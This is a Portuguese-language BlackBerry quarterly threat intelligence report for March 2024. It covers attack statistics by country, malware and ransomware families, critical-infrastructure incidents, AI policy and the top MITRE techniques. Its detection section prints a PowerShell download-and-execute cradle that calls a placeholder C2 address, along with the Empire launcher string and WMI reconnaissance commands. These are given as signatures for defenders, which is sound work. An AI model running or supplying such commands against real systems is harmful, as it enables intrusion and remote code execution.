BlackBerry Relatório trimestral sobre ameaças globais - março de 2024

De setembro a dezembro de 2023, as soluções de segurança cibernética da BlackBerry interromperam mais de 5.200.000 ataques cibernéticos. Embora esse período de relatório seja mais longo do que nas edições anteriores, uma análise dos dados por dia mostra um aumento de 19% no número de ataques cibernéticos interrompidos nesse período em comparação com nossa última edição.

Além disso, observamos uma média de cerca de 5.300 amostras únicas de malware por dia direcionadas aos nossos clientes, totalizando mais de 630.000 amostras registradas nesse período do relatório, o que representa um aumento de 27% em relação ao período do relatório anterior.

A Figura 2 também mostra os cinco países em que as soluções de segurança cibernética da BlackBerry registraram o maior número de hashes de malware exclusivos. Os Estados Unidos estão em primeiro lugar, registrando a maior porcentagem de malware exclusivo. O segundo, o terceiro e o quarto países com a maior porcentagem de malware exclusivo estavam todos na região da Ásia-Pacífico. A Coreia do Sul ficou em segundo lugar, seguida pelo Japão (terceiro) e pela Austrália (quarto). O Canadá ficou em quinto lugar pelo segundo período consecutivo.

Observando a Figura 2 acima, é óbvio que o número total de ataques interrompidos por país não está necessariamente correlacionado com o número de hashes exclusivos registrados.

Há vários fatores por trás desses resultados, incluindo a motivação do atacante, a complexidade dos ataques e os objetivos de um ataque. Um invasor pode ter como objetivo atingir a população em geral de um país (ou um setor específico), utilizando campanhas de spam para atingir as massas. Um hash pode ser facilmente refeito, o que não afeta a execução do código mal-intencionado do arquivo, mas altera os algoritmos de hash exclusivos de um arquivo para que ele pareça diferente para um scanner antimalware.

Os atacantes também podem empregar malware e ferramentas mais comuns ou "de prateleira" para causar danos generalizados. Entretanto, outros podem se concentrar em um pequeno grupo de pessoas, um setor ou uma empresa individual. Em casos hiperdirecionados, os agentes de ameaças podem ter como alvo funcionários individuais de uma empresa de interesse. Esses agentes mal-intencionados podem até implantar ferramentas e táticas mais exclusivas contra alvos muito específicos e normalmente de alto valor, usando software de IA generativo para criar deepfakes.

Na Figura 3 acima, você verá como o número total de ataques interrompidos e os hashes de malware exclusivos encontrados variam por país ao longo do tempo, desde o período do relatório anterior até o período do relatório atual.

• Os Estados Unidos, o Japão e o Peru permanecem os mesmos em termos de número geral de ataques interrompidos, enquanto a Coreia do Sul sobe da terceira para a segunda posição no ranking de malware exclusivo, ultrapassando o Japão.
• Além disso, na região da Ásia-Pacífico, a Austrália foi uma nova entrada para a maioria dos ataques interrompidos nesse período do relatório, ficando em segundo lugar, atrás apenas dos Estados Unidos. A Austrália ficou em quarto lugar no número de hashes exclusivos direcionados aos sistemas dos clientes.      
• BlackBerryregistrou que as entidades sediadas no Canadá sofreram menos ataques nesse período, caindo do segundo para o quinto lugar. Em nossos dados exclusivos de malware durante esse período de relatório, o Canadá manteve sua posição de quinto lugar.

A recente entrada da Austrália em nossa lista dos cinco principais ataques interrompidos pode ser resultado de eventos geopolíticos recentes. Em novembro de 2023, o Australian Signals Directorate (ASD) publicou seu Relatório Anual de Ameaças Cibernéticas 2022-2023, que revelou as principais tendências em crimes cibernéticos enfrentados por governos, empresas e indivíduos australianos. Em seu relatório, a ASD identificou a parceria AUKUS, com seu foco em submarinos movidos a energia nuclear e outros recursos militares avançados, como "provavelmente um alvo para agentes estatais que buscam roubar propriedade intelectual para seus próprios programas militares". O diretor da ASD afirmou ainda que, à medida que a Austrália "se torna mais capaz militarmente, isso obviamente chamará a atenção em termos das áreas nas quais outros atores estarão interessados".

Além disso, a ASD informou que cerca de 94.000 denúncias de atividades criminosas cibernéticas foram feitas às autoridades policiais por indivíduos e empresas em toda a Austrália em 2023, um aumento de 23% em relação ao ano anterior, sendo que somente o ransomware causa até US$ 3 bilhões em danos à economia australiana todos os anos. As perdas para pequenas empresas na Austrália que foram alvo de ataques cibernéticos foram, em média, de quase US$ 46.000 por empresa no ano passado, um aumento em relação aos US$ 30.000 do ano fiscal anterior.

Para ajudar a combater esse aumento na atividade cibernética, a ASD anunciou o lançamento da campanha de conscientização sobre segurança cibernética "Act Now, Stay Secure" (Aja agora, mantenha-se seguro), que identificou as principais ameaças cibernéticas para indivíduos e empresas de pequeno e médio porte. A campanha ressaltou a necessidade de "agir agora" para lidar com as ameaças cibernéticas, afirmando que "por muito tempo, os cidadãos e as empresas australianas foram deixados à própria sorte contra as ameaças cibernéticas globais", e estabelece uma visão ousada para ser "um líder mundial em segurança cibernética até 2030".

Infraestrutura crítica

A infraestrutura crítica é a espinha dorsal de qualquer sociedade moderna e é vital para todos os aspectos de sua funcionalidade. Na verdade, a CISA, sediada nos EUA, definiu 16 setores diferentes como estando sob a égide da infraestrutura crítica. Esses setores incluem transporte, saúde, energia, comunicações, finanças, defesa, setor industrial e vários outros.

Como os sistemas e ativos de muitos desses setores estão entrelaçados em um cenário digital interconectado, eles se encontram frequentemente na mira de agentes de ameaças cibernéticas que tentam explorar as vulnerabilidades e as configurações incorretas de segurança por motivos variados.

Isso ficou evidente durante o último período do relatório, quando CylanceENDPOINT^™ da BlackBerry e outras soluções de segurança cibernética da BlackBerry impediram mais de dois milhões de ataques contra vários setores da infraestrutura crítica, sendo que somente o setor financeiro sofreu mais de um milhão de ataques.

Além disso, as organizações do governo e do setor público sofreram a mais diversificada propagação de ataques, com mais de 36% dos hashes exclusivos direcionados a esse setor.

As ameaças cibernéticas que têm como alvo esse conjunto diversificado de setores têm o potencial de causar interrupções em massa e incapacitar ou comprometer ativos, sistemas e redes essenciais de suas respectivas entidades. Isso, por sua vez, pode ter um efeito grave na segurança econômica, na saúde pública e na estabilidade social de uma nação, independentemente da escala do ataque, do desenvolvimento econômico da nação ou do seu padrão de vida.

BlackBerry observou várias famílias de malware direcionadas a vários setores em nossa telemetria interna durante o período do relatório:

O PrivateLoader é uma família de downloader malicioso, escrito em C++ e observado continuamente desde que foi descoberto pela primeira vez em 2021. O malware é frequentemente usado para facilitar a implantação de infostealers no dispositivo da vítima. De acordo com nossa telemetria, o PrivateLoader foi observado nesse período de relatório tentando atingir sistemas relacionados a serviços financeiros, alimentos e agricultura e instalações governamentais.  

O PrivateLoader é conhecido por distribuir uma ampla gama de cargas maliciosas de complexidades variadas. A rede de distribuição do malware é gerenciada por meio de um serviço clandestino de pagamento por instalação (PPI), que financia o uso e o desenvolvimento contínuos do malware e de sua infraestrutura.

O RisePro é um infostealer de commodities que tem sido visto na natureza desde 2022. Por meio de nossas investigações dos indicadores de comprometimento (IoCs) do PrivateLoader, notamos que várias amostras tentaram implantar malware por meio de seu serviço de distribuição, incluindo o RisePro. Uma vez no dispositivo da vítima, o RisePro tentará se comunicar com seu comando e controle (C2) e obterá ilicitamente dados privados e confidenciais antes de enviá-los aos servidores do invasor. Esses dados roubados podem ser vendidos a outros terceiros mal-intencionados ou usados em atividades secundárias direcionadas à vítima afetada.

SmokeLoader é um malware multiuso que foi observado pelo site BlackBerry em períodos anteriores do relatório. O malware atua como um backdoor independente, mas é frequentemente usado como um mecanismo de entrega para outros malwares. O SmokeLoader geralmente é baixado inadvertidamente por meio de documentos ou links de phishing antes de se instalar em um dispositivo visado. Esse malware foi observado como alvo do setor de energia neste período do relatório.

Notavelmente, no período do relatório, o Centro Nacional de Coordenação de Segurança Cibernética (NCSCC) da Ucrânia observou um aumento de ataques relacionados ao SmokeLoader também direcionados a organizações governamentais. O que torna o SmokeLoader tão potente é sua capacidade de implantar vários outros malwares no dispositivo da vítima.

No passado, o SmokeLoader era conhecido por lançar uma infinidade de infostealers, como Amadey, RedLine e Vidar, mas também por atuar como um mecanismo de entrega de ransomware. O grupo de ameaças por trás do 8Base ransomware já havia usado o SmokeLoader para distribuir uma variante do Phobos ransomware.

O PikaBot é um malware furtivo e evasivo que surgiu no início de 2023 e tem sido uma ameaça proeminente ao longo do ano. Esse malware modular compartilha muitas semelhanças com o cavalo de Troia QakBot e pode receber vários comandos de seu C2. Durante o período deste relatório, o PikaBot foi identificado em entidades governamentais e do setor de energia.

O PikaBot é persistente e tem várias funções para evitar que seja analisado por pesquisadores de ameaças, incluindo várias verificações anti-sandbox/anti-análise. Uma vez no dispositivo da vítima, o malware pode receber e executar comandos para coletar informações valiosas sobre o dispositivo e executar ordens recebidas de seu C2.

Os infostealers de commodities também estiveram moderadamente ativos durante este trimestre. Muitos infostealers são vendidos como MaaS e utilizados em campanhas de grande escala.

O LummaStealer (LummaC2) é um infostealer baseado em C que se concentra na exfiltração de dados privados e confidenciais do dispositivo da vítima. O LummaStealer tem uma capacidade notável de obter dados de carteira de criptomoedas e dados de extensão de navegador de autenticação de dois fatores (2FA). Durante todo o período do relatório, o LummaStealer foi observado pelo site BlackBerry visando instituições financeiras e entidades governamentais.

RecordBreaker (RaccoonStealer) é outro infostealer amplamente distribuído que foi temporariamente encerrado devido à prisão de um membro central do grupo de ameaças em 2022. No entanto, o grupo retornou em meados de 2023 com uma versão atualizada. Nossa telemetria registrou o RecordBreaker atacando instituições de saúde, tanto no período deste relatório quanto no anterior.

RedLine O infostealer tem sido uma das ameaças mais observadas no site BlackBerryem relatórios anteriores. O .NET compiled stealer tem um forte foco em raspagem de credenciais e roubo de vários softwares e plataformas digitais, com foco em informações de cartão de crédito e carteiras de criptomoedas. 

O RedLine está amplamente disponível em fóruns clandestinos, vendido como uma assinatura ou como um produto autônomo por um custo relativamente baixo. A família de malware foi direcionada principalmente para os setores de comunicações e governo no período do relatório.

Durante o período do relatório, o cenário mais amplo de ameaças cibernéticas também foi altamente ativo, testemunhando vários ataques notáveis contra organizações de infraestrutura crítica em todo o mundo.

Em meados de outubro, o Morrison Community Hospital, sediado em Illinois, foi a suposta vítima de uma violação pela gangue de ransomware BlackCat/ALPHV com uma aparição em seu site obscuro. O próprio hospital publicou uma notificação de segurança várias semanas depois em seu site, informando que havia sofrido um incidente no final de setembro que "envolveu uma parte não autorizada que obteve acesso ao nosso ambiente de rede". No entanto, não mencionou o nome do invasor ou se algum arquivo foi bloqueado ou roubado. 

Em novembro, a entidade estatal eslovena de energia Holding Slovenske Elektrarne (HSE) foi vítima de um ataque de ransomware. Como fornecedora de aproximadamente 60% da produção de energia do país, foi uma sorte que a violação e a criptografia de arquivos não impediram a produção ou o fornecimento de energia.

Embora os atacantes nesse caso não tenham sido nomeados oficialmente, o grupo de ransomware Rhysida pode ter sido o culpado. Esse grupo alegou ter vitimado o HSE em seu site várias semanas depois.

Novembro também trouxe a notícia de que outra entidade estatal foi submetida a um ataque e violação de uma gangue de ransomware. Dessa vez, tratava-se de uma empresa de serviços de telecomunicações, em grande parte estatal, que havia sido vítima de um ataque um mês antes pela gangue RansomEXX, com até 6 GB de dados roubados. Isso incluía muitas formas diferentes de informações de identificação pessoal (PII). Os relatórios também indicaram que um arquivo de dados CSV com informações sobre mais de um milhão de seus clientes foi vazado na dark web.

O RansomEXX (também conhecido como Defray e Defray777) é uma família de ransomware que foi vista pela primeira vez em 2018. Existem variantes para Windows e Linux dessa família de malware, que foi usada principalmente em explorações de alto perfil em agências governamentais e fabricantes. O RansomEXX é executado como um modelo de ransomware como serviço (RaaS), com uma variante chamada RansomEXX2 escrita na linguagem de programação Rust surgindo em 2022.

Nos Estados Unidos, a CISA emitiu um alerta em 28 de novembro de 2023, em resposta ao que a CISA chamou de "exploração ativa dos controladores lógicos programáveis (PLCs) da Unitronics". Esses são computadores usados em instalações de água e esgoto. O alerta especificava que esses tipos de instalações estavam sendo ativamente visados por agentes de ameaças cibernéticas e aconselhava outras instalações de água e esgoto a seguir todas as diretrizes e medidas de precaução recomendadas.

Em uma continuação da atividade mencionada na edição de novembro de 2023 do nosso Relatório de Inteligência sobre Ameaças Globais, a gangue LockBit continuou a visar organizações de infraestrutura crítica, apesar de uma tentativa de remoção pelo FBI em fevereiro de 2024. Na véspera de Natal de 2023, a gangue LockBit foi implicada em um ataque à rede hospitalar alemã Katholische Hospitalvereinigung Ostwestfalen gGmbH (KHO). O ataque matinal conseguiu violar e criptografar dados de arquivos, resultando em graves interrupções nos serviços de três hospitais KHO diferentes.

A gangue LockBit também foi vista atacando outras entidades e setores dentro da infraestrutura crítica, aproveitando a exploração da CVE-2023-4966 - a vulnerabilidade Citrix Bleed - para obter acesso inicial. Isso fez com que o governo dos EUA emitisse uma CSA (Cybersecurity Advisory) conjunta, sugerindo que as organizações corrigissem e seguissem todas as diretrizes e práticas recomendadas de mitigação.

Para aqueles que foram vítimas do LockBit no passado, as ferramentas de recuperação de arquivos já estão disponíveis. O FBI, a Europol, a polícia japonesa e a National Crime Agency colaboraram para disponibilizar essas ferramentas no portal "No More Ransom", agora disponível em 37 idiomas.

As empresas comerciais, principalmente de manufatura e varejo, foram alvos de vários ataques nos últimos quatro meses.

Em novembro, varejistas israelenses foram supostamente atingidos pelo grupo hacktivista Cyber Toufan, que também atacou a empresa de hospedagem israelense Signature-IT. Desde novembro de 2023, no contexto do conflito contínuo entre Israel e Hamas em Gaza, o grupo teria lançado centenas de operações cibernéticas contra alvos israelenses. Muitos varejistas globais, como a IKEA, foram fortemente afetados pelo ataque da Signature-IT. Em uma publicação em seu canal do Telegram, o grupo alegou ter comprometido mais de 150 vítimas. Eles supostamente limparam e destruíram mais de 1.000 servidores e bancos de dados críticos.  

O mês de dezembro trouxe um lembrete de que a maior ameaça às empresas costuma ser sua própria complacência. Um banco de dados desprotegido e acessível pela Internet, hospedado pela Real Estate Wealth Network, foi descoberto por agentes mal-intencionados e saqueado. O banco de dados tinha 1,16 TB de dados - cerca de 1,5 bilhão de registros - incluindo nomes de proprietários, vendedores e detalhes de investidores. O banco de dados representa uma coleção central de dados imobiliários dos EUA, incluindo endereços de funcionários do governo e até mesmo informações sobre dívidas.

As vítimas de tais ataques variam, dependendo dos objetivos do grupo criminoso de ransomware. No final de 2023, um dos maiores fabricantes de vestuário, calçados e roupas, a VF Corporation, foi atacado pelo grupo de ransomware ALPHV (BlackCat). No momento, a investigação ainda não foi concluída, mas foi confirmado que os dados de 35,5 milhões de clientes de marcas como North Face, Timberland e Vans foram roubados.

O Relatório de Riscos Globais 2024 do Fórum Econômico Mundial classifica a ameaça da insegurança cibernética como um dos "riscos globais mais graves previstos para os próximos dois anos". Armados com técnicas cada vez mais sofisticadas, incluindo o uso de inteligência artificial (IA), o consenso é que os ataques cibernéticos continuarão a ser altamente disruptivos e visarão cada vez mais a infraestrutura essencial. 

BlackBerry A telemetria demonstra que as entidades de infraestrutura essencial enfrentaram muitos ataques durante o período do relatório. Os ataques estão se tornando cada vez mais sofisticados, com o uso de novas técnicas de malware, incluindo aquelas geradas por IA, aumentando o risco de paralisar a infraestrutura essencial. Os governos de todo o mundo iniciaram uma série de medidas destinadas a aumentar a resiliência cibernética da infraestrutura essencial, com ênfase especial na proteção contra os riscos associados ao uso malicioso da IA.

Embora os governos reconheçam que a IA tem um potencial significativo para o bem, incluindo o aumento da eficiência operacional dos sistemas de infraestrutura crítica, muitos também temem que o impulso para otimizar a eficiência por meio da implantação de sistemas baseados em IA na infraestrutura crítica possa representar sérios riscos à segurança.

Para evitar isso, os governos estão pedindo ao setor que priorize a segurança ao desenvolver e implantar modelos de IA cada vez mais avançados:

"Nas últimas quatro décadas, desde a criação da Internet até a adoção em massa de software e o surgimento das mídias sociais, testemunhamos a segurança sendo forçada a ficar em segundo plano, pois as empresas priorizam a velocidade de comercialização e os recursos em detrimento da segurança. O desenvolvimento e a implementação de software de IA devem romper o ciclo de velocidade em detrimento da segurança."

- Roteiro da CISA para IA

Os governos de todo o mundo se apressaram em desenvolver e emitir orientações que incentivam uma abordagem "segura por padrão" para o desenvolvimento e o uso de sistemas avançados de IA. Outros países e alianças políticas, como o Reino Unido, o Canadá, a UE e o G7, também emitiram diretrizes sobre o desenvolvimento e o uso responsáveis de sistemas avançados de IA. Isso incluiu diretrizes conjuntas endossadas por mais de 20 agências nacionais de segurança cibernética em todo o mundo, enfatizando a necessidade de os criadores de sistemas de IA tomarem decisões informadas sobre o projeto, o desenvolvimento, a implantação e a operação de sistemas de IA de uma forma que priorize a segurança durante todo o ciclo de vida do sistema.

Além disso, em outubro de 2023, o presidente dos EUA, Biden, divulgou uma Ordem Executiva sobre "Inteligência Artificial Segura, Protegida e Confiável"(EO 14110) que, entre outras coisas, instruiu a CISA a avaliar os possíveis riscos relacionados ao uso de IA em setores de infraestrutura crítica, incluindo maneiras pelas quais a implantação de IA pode tornar os sistemas de infraestrutura crítica mais vulneráveis a falhas, ataques físicos e ataques cibernéticos.  

Em novembro de 2023,a BlackBerry anunciou um acordo histórico de segurança cibernética com o governo da Malásia, permitindo que eles aproveitem o conjunto completo de soluções confiáveis de segurança cibernética da BlackBerry , a fim de fortalecer a postura de segurança da Malásia. Como parte desse esforço, o BlackBerry fez uma parceria com o SANS Institute para abrir um Centro de Excelência em Segurança Cibernética (CCoE) de última geração em Kuala Lumpur, a capital da Malásia, em 2024. O CCoE oferecerá treinamento especializado para aprimorar a capacidade e a prontidão da segurança cibernética da Malásia. O BlackBerry está entusiasmado em ajudar a construir o ecossistema de aprendizado de segurança cibernética do país - especialmente nas áreas de IA e aprendizado de máquina - para ajudar a aumentar e aprimorar a força de trabalho de segurança cibernética da Malásia, além de tornar a região do Indo-Pacífico mais segura.

O primeiro-ministro canadense Justin Trudeau disse: "A segurança cibernética é um pilar fundamental da Estratégia Indo-Pacífico do Canadá, que visa promover a paz, a segurança e a cooperação na região. A segurança cibernética é um desafio compartilhado que exige cooperação internacional, e é por isso que apoiamos fortemente o Centro de Excelência em Segurança Cibernética BlackBerry na Malásia, um importante parceiro bilateral do Canadá. Ao apoiar os futuros defensores cibernéticos da Malásia e estabelecer redes regionais mais fortes para o compartilhamento de conhecimentos entre o Canadá e o Sudeste Asiático, podemos fortalecer ainda mais a resiliência e a capacidade dos nossos dois países e da região em geral para combater, deter e responder às ameaças cibernéticas."

Durante o período do relatório, governos e empresas foram constantemente lembrados da vulnerabilidade de suas redes. Em setembro de 2023, foi revelado que hackers chineses haviam violado a plataforma de e-mail da Microsoft, roubando dezenas de milhares de e-mails de contas do Departamento de Estado dos EUA. Isso ocorreu após relatos anteriores de ataques semelhantes contra outros alvos do governo dos EUA, incluindo o Departamento de Comércio. Recentemente, também foi revelado que as autoridades canadenses que trabalham na Global Affairs Canada sofreram uma "violação prolongada da segurança de dados".

Como o Centro de Segurança Cibernética do Canadá enfatizou em sua mais recente "Avaliação Nacional de Ameaças Cibernéticas", a infraestrutura essencial está cada vez mais em risco de atividades de ameaças cibernéticas. Atores patrocinados pelo Estado estão buscando ativamente se infiltrar nesses sistemas, e tecnologias disruptivas, como a IA, podem possibilitar novas ameaças. Conforme observado neste relatório, a Austrália também sofreu vários ataques cibernéticos de alto nível em sua infraestrutura essencial, incluindo a segunda maior empresa de telecomunicações da Austrália, a Optus, e a maior seguradora de saúde privada, a Medibank.

O setor também não está imune a essas ameaças, e novas regulamentações surgiram em 2023 para começar a lidar com isso. Por exemplo, em dezembro de 2023, entrou em vigor um novo conjunto de regras que exige que as empresas de capital aberto divulguem incidentes cibernéticos "relevantes" para a Comissão de Valores Mobiliários dos Estados Unidos, no prazo de quatro dias. Na Europa, a UE aprovou recentemente a Lei de Resiliência Cibernética, que estabelece novos requisitos de segurança cibernética para produtos de hardware e software com elementos digitais vendidos na União Europeia. Isso se soma às medidas extras exigidas na Diretiva de Segurança de Redes e Informações atualizada da UE para ajudar a lidar com as vulnerabilidades de segurança cibernética das entidades de infraestrutura essencial.

Por fim, em novembro de 2023, a Austrália lançou sua Estratégia de Segurança Cibernética, que exigia uma abordagem "de todo o país" para proteger informações essenciais, compartilhar inteligência sobre ameaças e promover o uso de produtos tecnológicos seguros e protegidos.

Em face do cenário de ameaças em constante evolução, o site BlackBerry tem constantemente chamado a atenção para a necessidade de modernizar a segurança, substituindo as tecnologias legadas (como VPNs) por soluções modernas de segurança cibernéticabaseadas em "confiança zero" e orientadas por IA que avaliam continuamente a postura de segurança de um dispositivo para evitar ataques cibernéticos antes que eles aconteçam. As tecnologias de segurança cibernética que priorizam a prevenção e empregam uma abordagem de confiança zero se tornarão cada vez mais essenciais à medida que os agentes de ameaças desenvolverem maneiras mais sofisticadas de burlar a segurança de TI tradicional ou legada. 

No próximo ano, é provável que a ameaça representada por ataques cibernéticos cada vez mais sofisticados aumente. Uma preocupação especial entre as autoridades de países democráticos em todo o mundo é a extensão em que os agentes mal-intencionados usarão a técnica digital para interromper os processos democráticos. Como uma estimativa de 49% da população global em 64 países vai às urnas para votar em 2024, alguns especialistas estão começando a soar o alarme de que os processos eleitorais e a infraestrutura também podem ser um alvo principal. Jen Easterly, diretora da CISA do governo dos EUA, alertou que "a IA generativa ampliará os riscos de segurança cibernética e tornará mais fácil, rápido e barato inundar o país com conteúdo falso".

Ela observou ainda que "com essa tecnologia agora mais disponível e poderosa do que nunca, seu uso malicioso está pronto para testar a segurança do processo eleitoral dos Estados Unidos, dando a atores nefastos que pretendem minar a democracia americana - incluindo China, Irã e Rússia - a capacidade de sobrecarregar suas táticas".

O sistema Common Vulnerabilities and Exposures (CVE), mantido pela The MITRE Corporation, é um catálogo de informações sobre vulnerabilidades e exposições conhecidas publicamente. O sistema CVE é patrocinado pelo Departamento de Segurança Interna dos EUA (DHS) e pela CISA.

Este período do relatório registrou o surgimento de novas vulnerabilidades encontradas nos produtos ^Cisco®, ^Apache®, ^Citrix® e ^JetBrains®. Os métodos de mitigação dessas vulnerabilidades já foram publicados, mas certos agentes de ameaças ainda aproveitaram ao máximo os sistemas não corrigidos.

A compreensão das técnicas de alto nível dos grupos de ameaças pode ajudar a decidir quais técnicas de detecção devem ser priorizadas. O site BlackBerry observou as seguintes 20 principais técnicas do MITRE sendo usadas por agentes de ameaças nesse período do relatório.

Uma seta para cima na última coluna indica que o uso da técnica aumentou desde nosso último relatório. Uma seta para baixo indica que o uso diminuiu desde nosso último relatório. Um símbolo de igual (=) significa que a técnica permanece na mesma posição que em nosso último relatório.

A injeção de processo é uma técnica de evasão defensiva comumente explorada que ocorre quando um código malicioso é colocado no espaço de endereço de outro processo em execução.

Abaixo, há uma série de funções nativas do Windows que podem ser abusadas ao serem injetadas em um processo.

Funções chamadas em ordem (varia de acordo com o ataque):

• VirtualAlloc(Ex) - Alocação de memória no processo
• WriteProcessMemory() - Gravação de código malicioso na memória alocada
• VirtualProtect - Reproteção da memória com permissões executáveis
• CreateRemoteThread() - Executa código malicioso no contexto de outro processo

Os invasores utilizam software personalizado de roubo de informações para registrar as entradas dos usuários em um sistema comprometido por meio do monitoramento da interface gráfica do usuário (GUI) ou, alternativamente, por meio do registro das teclas digitadas.

BlackBerry descobriu que, ao monitorar processos incomuns que estavam realizando capturas de entrada de qualquer forma, era possível identificar e corrigir as ameaças com sucesso.

O comportamento comum que o site BlackBerry definiria como "incomum" inclui assinaturas inválidas, processos filhos gerados a partir de um processo pai atípico e chamadas de função específicas da API do Windows.

Chamadas de função para monitorar:

• SetWindowsHook(Ex) - Monitora eventos como entradas na área de trabalho
• GetKeyboardState() - Obtém o status do estado atual da tecla virtual
• GetKeyState() - Obtém o status do estado atual da chave virtual
• GetAsyncKeyState() - Obtém o status do estado atual da chave virtual

A enumeração de informações do sistema de um sistema comprometido pode fornecer a um agente de ameaças o contexto para identificar ainda mais os pontos fracos e os possíveis vetores de exploração, a fim de aumentar os privilégios e obter acesso irrestrito ao sistema.

Ao criar uma linha de base de comportamento comum em toda a rede e observar as exceções, os profissionais de segurança cibernética podem observar quaisquer anomalias.

Ao abusar do Windows Management Instrumentation (WMI), um agente de ameaças pode localizar informações sobre software antivírus, discos lógicos e usuários para identificar pontos de pivô ou áreas de interesse/fraqueza a serem exploradas por um invasor. No entanto, essas chamadas são relativamente pouco convencionais para a maioria dos usuários. O monitoramento de sua ocorrência pode identificar um agente mal-intencionado ou malware no sistema da vítima.

Abaixo estão as linhas de comando que podem ser úteis para monitorar:

• SELECT * FROM AntiVirusProduct - Uma linha de comando WMI para enumerar os produtos antivírus presentes no sistema
• wmic OS get OSArchitecture, Version - Utiliza o WMI para enumerar informações sobre a versão do sistema
• systeminfo - Fornece informações do sistema ao usuário
• driverquery /v - Lista as unidades instaladas no sistema

Os invasores podem executar seu próprio código mal-intencionado aproveitando a ordem de pesquisa das bibliotecas de vínculo dinâmico (DLLs). Eles fazem isso colocando a carga útil mal-intencionada e o aplicativo legítimo da vítima um ao lado do outro. Depois disso, sempre que um executável legítimo for executado, ele carregará o binário mal-intencionado enquanto a ordem de pesquisa normal do sistema estiver sendo aproveitada pelo invasor.

Além disso, os locais do sistema, como o Windows Side-by-Side (SxS) e as pastas do sistema, devem ser cuidadosamente monitorados quanto à exclusão e à substituição de DLLs, uma medida que os adversários mais avançados tentarão evitar com as soluções modernas de detecção e resposta (EDR) de antivírus/endpoint.

Uma maneira comum de identificar o carregamento lateral de DLLs é monitorar os módulos que estão sendo carregados de locais anormais, como a lixeira, pastas temporárias e caminhos comuns do sistema.

Ao usar protocolos que não são da camada de aplicativos, os adversários tentam se esquivar das defesas que estão maduras e ajustadas para detectar comportamentos mal-intencionados. Do ponto de vista da mitigação e da prevenção, protocolos menos comuns, como o ICMP, devem ser monitorados quanto às comunicações C2.

Uma abordagem segura e com redução de riscos que os clientes do BlackBerry podem adotar é criar regras personalizadas para monitorar cadeias de caracteres específicas na camada de rede e usar essas regras em combinação com regras de detecção comportamental mais avançadas. Ao aplicar medidas preventivas em camadas em conjunto com uma presença de segurança adequada, os clientes e defensores do BlackBerry podem reduzir sua suscetibilidade a ataques e aumentar sua conscientização sobre a segurança.

No último relatório, a equipe do CylanceGUARD constatou que a técnica "Common File Archive Exfiltration Staging" foi utilizada de forma abusiva em todas as regiões geográficas em que o BlackBerry tem clientes. No entanto, neste período do relatório, registramos um padrão de detecções do PowerShell em todas as regiões.

Nas regiões EMEA e NALA, a equipe do CylanceGUARD notou um aumento nas detecções relacionadas ao PowerShell Empire - "Possible Empire Encoded Payload". O PowerShell Empire é uma estrutura pós-exploração de código aberto que é comumente usada tanto por invasores quanto por testadores de penetração/equipes vermelhas legítimas.

A estrutura Empire se concentra essencialmente em visar ambientes Windows usando a linguagem de script do PowerShell. Isso permite que um invasor se comunique com a máquina da vítima para fornecer e receber comandos e informações de servidores C2.

Um indicador precoce de Empire é a detecção de um comando como, por exemplo, "Empire":

"POWERSHELL -NOP -STA -W 1 -ENC." Essa é a cadeia de caracteres padrão do iniciador nos ouvintes HTTP do Empire.

Observe que é trivial para o invasor alterar ou ofuscar esse valor. No entanto, em muitos casos, esse valor não é alterado e, portanto, é uma assinatura eficaz para as equipes de detecção e os analistas do centro de operações de segurança (SOC).

Na região da APAC, observamos uma mudança da tática Acesso a Credenciais(TA0006) para Execução(TA0002) como a ameaça mais comumente observada. O PowerShell foi novamente uma presença importante em nossas detecções. A técnica MITRE relacionada observada foi Command and Scripting Interpreter: PowerShell(T1059.001). Durante nossas investigações, o padrão mais comumente observado usado pelos agentes de ameaças foi um berço de download, ou seja, um único comando usado tanto para download quanto para execução de código.

Por exemplo:

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('hxxp://x.x.x.x/test[.]exe')

- Isso faria o download e executaria o arquivo test.exe de um possível servidor C2.

O padrão do PowerShell sendo fortemente detectado nos ambientes de nossos clientes destaca a importância de garantir que as organizações tenham a visibilidade e os controles adequados para limitar o abuso relacionado ao PowerShell.

Como parte da oferta CylanceGUARD , nossa equipe de integração (conhecida como consultores ^ThreatZERO® ) trabalha em estreita colaboração com nossos clientes para garantir que seus dispositivos sejam colocados nas políticas recomendadas, como Script Control Block (SCB - PS), para limitar a capacidade de um invasor de abusar de utilitários como o PowerShell.

Este relatório representa os esforços de colaboração de nossas equipes e indivíduos talentosos. Em especial, gostaríamos de reconhecer:

Adrian Chambers
Amalkanth Raveendran
David Hegarty
Dean Given
Geoff O'Rourke
Ismael Valenzuela Espejo
Jacob Faires
John de Boer
Kristofer Vandercook
Natalia Capponi
Natasha Rohner
Patryk Matysik
Pedro Drimel
Ronald Welch
Travis Hoxmeier
William Johnson

As informações contidas no Relatório de Inteligência sobre Ameaças Globais do site BlackBerry destinam-se apenas a fins informativos. O site BlackBerry não garante nem se responsabiliza pela precisão, integridade e confiabilidade de quaisquer declarações ou pesquisas de terceiros aqui mencionadas. A análise expressa neste relatório reflete o entendimento atual das informações disponíveis por parte de nossos analistas de pesquisa e pode estar sujeita a alterações à medida que informações adicionais forem divulgadas. Os leitores são responsáveis por exercer sua própria diligência ao aplicar essas informações em suas vidas privadas e profissionais. O site BlackBerry não tolera qualquer uso malicioso ou indevido das informações apresentadas neste relatório.